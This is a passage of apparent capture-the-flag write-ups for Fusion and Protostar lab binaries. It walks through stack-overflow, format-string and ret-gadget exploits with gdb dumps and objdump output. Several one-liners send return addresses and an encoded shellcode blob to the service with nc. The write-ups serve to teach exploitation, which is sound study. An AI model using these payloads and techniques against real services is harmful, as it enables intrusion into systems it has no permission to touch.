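payload += b"\xff\xe6"                  # esp points here next: jmp *%esi
payload += b" HTTP/1.1\r\n"             # keeps the request well-formed
# shellcode follows; esi points back into the buffer that holds it
```

After the overwritten return executes jmp esp, the CPU runs the two bytes sitting at the top of the stack, which immediately pivot to ESI.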

fusion@fusion:~$ python -c 'print "GET " + "A"*139 + "\x4f\x9f\x04\x08" + "\xFF\xE6" + " HTTP/1.1\r\n" + "\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd"' | nc 20001

I tested it outside of GDB and it worked like a champ!


Fusion Exploit Challenges Level00 Solution



I began by looking for the port level00 listens on. It wasn't in the source code, so I found it by running netstat -tulpn:


From the output you can see level00 listens on port 20000. We could also have found this by setting a breakpoint on SERVE_FOREVER and examining the port passed to it. After looking through the code, I determined the vulnerable function is fix_path: it performs a strcpy with no bounds checking of any kind, assuming realpath does not truncate our input in any way. In order to reach that code, I began by constructing a string with python. I started with:

python -c 'print "GET  HTTP/1.1 " + "A"*300' | nc 20000

NOTE: There must be two spaces after the GET statement! If you look at the code, it looks for "GET ", but then uses strchr to find the first space after the first 4 characters; everything after that space is compared against the HTTP version string. With only one space, the parser grabs the As and compares those to the HTTP statement instead of the actual HTTP characters.
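A rough Python mimic of that parsing behavior (a reconstruction from the description above, not the actual level00 source) makes the two-space requirement concrete:

```python
# Reconstruction of the level00 request parser's logic.
def parse_request(req):
    if not req.startswith("GET "):           # literal "GET " prefix
        return None
    space = req.find(" ", 4)                 # strchr(req + 4, ' ')
    if space == -1:
        return None
    if not req[space:].startswith(" HTTP/1.1"):
        return None
    return req[4:space]                      # the extracted path
```

With an empty path, only the two-space form leaves a second space for the strchr-style search to find; a single space makes the parse fail outright.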

One interesting part of the code is the spot in parse_http_request where the strncmp call should be. It looks like the following:

0x08049925 <+208>: add DWORD PTR [ebp-0x10],0x1
0x08049929 <+212>: mov eax,DWORD PTR [ebp-0x10]
0x0804992c <+215>: mov edx,eax
0x0804992e <+217>: mov eax,0x8049efd
0x08049933 <+222>: mov ecx,0x8
0x08049938 <+227>: mov esi,edx
0x0804993a <+229>: mov edi,eax
0x0804993c <+231>: repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
0x0804993e <+233>: seta dl
0x08049941 <+236>: setb al
0x08049944 <+239>: mov ecx,edx
0x08049946 <+241>: sub cl,al
0x08049948 <+243>: mov eax,ecx
0x0804994a <+245>: movsx eax,al
0x0804994d <+248>: test eax,eax
0x0804994f <+250>: je 0x8049965 <parse_http_request+272>

It took me a bit to understand what I was looking at: the comparison was compiled in statically, i.e. the compiler inlined the function body (the repz cmps sequence) rather than emitting a call to an external function.
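In other words, the repz cmps / seta / setb sequence computes a three-way byte comparison, i.e. strncmp(a, b, 8) compiled inline. In Python terms (illustrative only, not generated from the disassembly):

```python
# Three-way comparison over the first n bytes, the same result the
# seta/setb pair reconstructs from the repz cmps flags.
def inline_strncmp(a, b, n=8):
    for i in range(n):
        if a[i] != b[i]:
            return 1 if a[i] > b[i] else -1
    return 0
```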

When I ran the command, it unfortunately only returned the words "trying to access". My suspicion at this point was that we have to find a way to reach the strcpy. We know this is a stack-based buffer overflow, and we know the path variable points to something on the stack.

I turned my attention to the realpath function to determine what it was doing. I followed the first call in realpath and saw __i686.get_pc_thunk.bx. Unsure of what that was I did a quick Google search:

"This call is used in position-independent code on x86. It loads the position of the code into the %ebx register, which allows global objects (which have a fixed offset from the code) to be accessed as an offset from that register."

I then realized that realpath is a standard library function that simply takes a canonical name and converts it to an actual path. This is obvious in hindsight, but it told me I needed to feed the program a properly formatted HTTP request. Here's what I sent:

python -c 'print "GET " + "/home/fusion/" + "A"*500 + " HTTP/1.1\r\n"' | nc 20000

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

I did a p path to determine that the path variable points to location 0xbffff34c. The next step was to determine where the return pointer for parse_http_request is. I placed a breakpoint on parse_http_request and then examined the top of the stack: the return address is at 0xbffff75c. The difference between the two is 1040 bytes. That doesn't seem right; my buffer is only 500-ish bytes, so this isn't the return address we're overwriting!

I stepped through the program to discover that the crash actually happens at the return from fix_path. This threw me off, because the return address for fix_path must be at a lower address than the buffer path (path was allocated first), so our buffer overflow shouldn't affect that address.

I concluded the overflow must actually occur in the resolved buffer. I found the return address of fix_path to be 0xbffff32c. I then decided to check the value of the return address for fix_path before and after the call to realpath, my suspicion being that path must be copied into resolved at some juncture.

My assumption was correct. x/x 0xbffff32c showed a value of 0x70 (the last byte of the return address) before the call to realpath and then a value of 0x41 after it. This is where our bug is!
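Python's os.path.realpath mirrors the libc behavior and shows why the copy overflows: canonicalization doesn't shrink a long path. A quick sketch with a made-up path (the target need not exist):

```python
import os

# realpath canonicalizes a path but does not shorten an already-clean
# one, so a long "/home/fusion/AAA..." name is copied essentially
# verbatim into the fixed-size resolved buffer.
long_path = "/home/fusion/" + "A" * 200
resolved = os.path.realpath(long_path)
print(resolved)
```

All 200 filler bytes survive canonicalization, which is exactly what lets them flow past the end of resolved.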

x/x resolved showed the address of resolved to be 0xbffff2a0. This means there's a difference of 140 bytes between the start of our target buffer and where the return address is, which jibes with what we know about the size of our buffers. I ran the following command:

python -c 'print "GET " + "/home/fusion/" + "A"*140 + "BBBB" + " HTTP/1.1\r\n"' | nc 20000

However, I still found the crash occurred with As in the return address. The 140 bytes was indeed correct, but it is measured from the start of resolved, and the "/home/fusion/" prefix (13 bytes) gets copied into resolved ahead of our As, so only 127 As are needed before the BBBB (13 + 127 = 140). Now we need to get our exploit code working. We'll use Cs to simulate the shellcode. I ran the program with the following command:

python -c 'print "GET " + "/home/fusion/" + "A"*127 + "BBBB" + " HTTP/1.1\r\n" + "C"*155' | nc 20000

(gdb) x/100x 0xbffff32c
0xbffff32c: 0x42424242 0xbffff300 0x00000020 0x00000004
0xbffff33c: 0x001761e4 0x001761e4 0x000027d8 0x20544547
0xbffff34c: 0x6d6f682f 0x75662f65 0x6e6f6973 0x4141412f
0xbffff35c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff36c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff37c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff38c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff39c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3ac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3cc: 0x41414141 0x41414141 0x41414141 0x42424242
0xbffff3dc: 0x54544800 0x2e312f50 0x430a0d31 0x43434343
0xbffff3ec: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff3fc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff40c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff41c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff42c: 0x43434343 0x43434343 0x43434343 0x43434343

Reminder: I knew to place the Cs after the HTTP statement because of the hint. So we should be able to use a return address of 0xbffff3ec. Now we try exploitation:

fusion@fusion:~$ python -c 'print "GET " + "/home/fusion/" + "A"*127 + "\xec\xf3\xff\xbf" + " HTTP/1.1\r\n" + "\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd"' | nc 20000

Sure enough that works!


Protostar Exploit Challenges Format0 Solution


Format0 is the introduction to the format string exploitation levels. There isn't much to it except a bit of minutiae in the printf function.


We must complete this level in under 10 bytes of input, which means we can't do our typical print-a-billion-As deal. What we do instead is use a field-width specifier: something like %64s says we want the string padded to a width of 64 characters, which sprintf will then write out. A few bytes of format string thus expand into a 64-byte write.

So our exploit simply looks like the following:
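A sketch of such a payload (hedged: the 64-byte buffer and the 0xdeadbeef target value are from the stock Protostar format0 source, which isn't reproduced here):

```python
# 4 bytes of format string expand to a 64-character padded write,
# so the little-endian target value lands just past the buffer while
# the input itself stays well under 10 bytes.
payload = b"%64s" + b"\xef\xbe\xad\xde"   # 0xdeadbeef, little-endian
print(len(payload))                       # 8 bytes of input
print(len("%64s" % ""))                   # but the specifier pads to 64
```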


Protostar Exploit Challenges Stack 7 Solution


This challenge is nearly identical to the last, except that you must find a ret gadget in the binary to bounce through and then jump to system.


Using the same tactics as before I determined the address of my environment variable was at 0xbffffe63.

Now what we need is a gadget containing a RET. There are fancier, more sophisticated ways to do this, but I'm just going to use objdump.

objdump -D stack7 | grep -E 'pop\s*%e[a-d]x' -A5 | grep ret -B1
8048382: c9 leave
8048383: c3 ret

8048493: 5d pop %ebp
8048494: c3 ret

80485c8: 5d pop %ebp
80485c9: c3 ret

80485f8: 5d pop %ebp
80485f9: c3 ret

8048616: c9 leave
8048617: c3 ret

As it happens there are a few! I decided to go with the one at 0x08048383.
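Packed out explicitly, the chain I'm about to send looks like this (addresses are from my run; the system() address and the environment-variable pointer will differ on other machines):

```python
import struct

RET    = 0x08048383   # plain ret gadget in stack7's own .text
SYSTEM = 0xb7ecffb0   # address being returned into (system() in my run)
SHELL  = 0xbffffe6c   # pointer at the /bin/sh environment variable

payload  = b"A" * 80                   # filler up to the saved return address
payload += struct.pack("<I", RET)      # first return target: the ret gadget
payload += struct.pack("<I", SYSTEM)   # the gadget's ret pops this next
payload += b"AAAA"                     # fake return address for system()
payload += struct.pack("<I", SHELL)    # system()'s single argument
```

Bouncing through the in-binary ret first satisfies the level's check on the saved return address, while the gadget's own ret immediately forwards execution to system().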

python -c 'print "A"*80 + "\x83\x83\x04\x08" + "\xb0\xff\xec\xb7" + "A"*4 + "\x6c\xfe\xff\xbf"'

And that works just fine!


It prints the word NONSENSE as expected.